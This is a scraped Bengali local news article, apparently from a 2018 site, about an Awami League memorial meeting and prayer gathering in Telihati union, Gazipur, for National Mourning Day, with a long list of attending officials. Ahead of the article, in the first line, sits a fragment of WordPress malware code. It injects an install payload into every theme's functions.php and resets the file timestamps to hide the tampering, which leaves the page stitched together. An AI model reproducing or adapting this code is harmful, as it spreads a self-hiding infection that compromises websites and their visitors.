if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')){ if (strpos($content, 'WP_V_CD') === false){ $content = $install_code . $content ; @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content); touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time ); } else { $ping = false; } } ?>
গাজীপুর প্রতিনিধি
১৫ আগষ্ট বঙ্গবন্ধু শেখ মুজিবুর রহমান এর ৪৩ তম শাহাদাত বার্ষিকী ও জাতীয় শোক দিবস উপলক্ষে তেলিহাটি ইউনিয়ন আওয়ামীলীগ ও সহযোগী সংগঠনের উদ্যোগে আলোচনা সভা ও দোয়া মাহফিল অনুষ্ঠিত হয়েছে।
১৬ আগষ্ট বৃহস্পতিবার তেলিহাটি ইউনিয়ন এর টেংরা আলহাজ্ব নওয়াব আলী উচ্চ বিদ্যালয় মাঠে আয়োজিত উক্ত অনুষ্ঠানে প্রধান অতিথি হিসেবে উপস্থিত ছিলেন গাজীপুর জেলা আওয়ামীলীগ এর সিনিয়র যুগ্ম সাধারণ সম্পাদক আলহাজ্ব এডভোকেট জামিল হাসান দুর্জয়।
বিশেষ অতিথি হিসেবে উপস্থিত ছিলেন শ্রীপুর উপজেলা পরিষদের চেয়ারম্যান আলহাজ্ব আব্দুল জলিল, গাজীপুর জেলা সেচ্ছাসেবকলীগের সাধারণ সম্পাদক নাসির উদ্দীন মীর্ধা জর্জ, তেলিহাটি ইউনিয়ন আওয়ামীলীগ এর সাবেক সাধারণ নাজিম উদ্দীন আকন্দ।
অনুষ্ঠানে সভাপতিত্ব করেন, তেলিহাটি ইউনিয়ন আওয়ামীলীগ এর সাবেক সাধারণ সম্পাদক আলহাজ্ব আব্দুস সাত্তার আবুল।
অনুষ্ঠানটি সঞ্চলনা করেন তেলিহাটি ইউনিয়ন আওয়ামীলীগ এর সাধারণ সম্পাদক তোফাজ্জল হোসেন।
অনুষ্ঠানে অনন্যের মধ্যে উপস্থিত ছিলেন, শ্রীপুর পৌর আওয়ামীলীগ এর সাধারণ সম্পাদক এডভোকেট নজরুল ইসলাম,শ্রীপুর উপজেলা বঙ্গবন্ধু পরিষদের সাধারণ সম্পাদক জাহাঙ্গীর সিরাজী, গাজীপুর জেলা ছাত্রলীগ এর সাধারণ সম্পাদক জাহিদুল আলম রবিন, শ্রীপুর উপজেলা ছাত্রলীগ এর সভাপতি জাকিরুল হাসান জিকু, সাধারণ সম্পাদক রাকিবুল হাসান রাকিব, শ্রীপুর উপজেলা সেচ্ছাসেবকলীগের সভাপতি শেখ সফিকুর রহমান সফিক, সাধারণ সম্পাদক সাইফুল ইসলাম সবুজ, জাতীয় শ্রমিকলীগ শ্রীপুর আঞ্চলিক শাখার সাংগঠনিক সম্পাদক সোলাইমান হক, শ্রীপুর উপজেলা যুবলীগের সসদস্য মনিরুজ্জামান মানিক, তেলিহাটি ইউনিয়ন যুবলীগের আহবায়ক মোস্তাফিজুর রহমান রিপন, যুগ্ম আহবায়ক সারোয়ার জাহান সগর, শ্রীপুর উপজেলা কৃষকলীগের সাধারণ সম্পাদক আইনুল হাসান, তেলিহাটি ইউনিয়ন কৃষকলীগের সভাপতি জহিরুল ইসলাম জর্জ,সাধারণ সম্পাদক শহীদুল ইসলাম শহীদ, তেলিহাটি ইউনিয়ন সেচ্চাসেবকলীগের আহবায়ক হযরত আলী জয়, যুগ্ম আহবায়ক দেলোয়ার হোসেন, শ্রীপুর উপজেলা ছাত্রলীগ এর সিনিয়র সহ সভাপতি শাহাদাত হোসেন রানা, তেলিহাটি ইউনিয়ন ছাত্রলীগ এর সাবেক সভাপতি শাহরিয়ার ইসলাম সুমন, শ্রীপুর উপজেলা ছাত্রলীগ এর যুগ্ম সাধারণ সম্পাদক পারভেজ মোশারফ, সহ সভাপতি শেখ আশিকুর রহমান আশিক, তেলিহাটি ইউনিয়ন ছাত্রলীগ এর সাবেক যুগ্ম সাধারণ সম্পাদক আনোয়ার পারভেজ, তেলিহাটি ইউনিয়ন ছাত্রলীগ এর সভাপতি জিল্লুর রহমান, সাধারণ সম্পাদক অনিক আহমেদ মাসুম প্রমখ।
About Us Contact Privacy & Policy DMCA Sitemap
© সর্বস্বত্ব স্বত্বাধিকার সংরক্ষিত | সেরা নিউজ টুয়েন্টিফোর ডটকম -২০১৮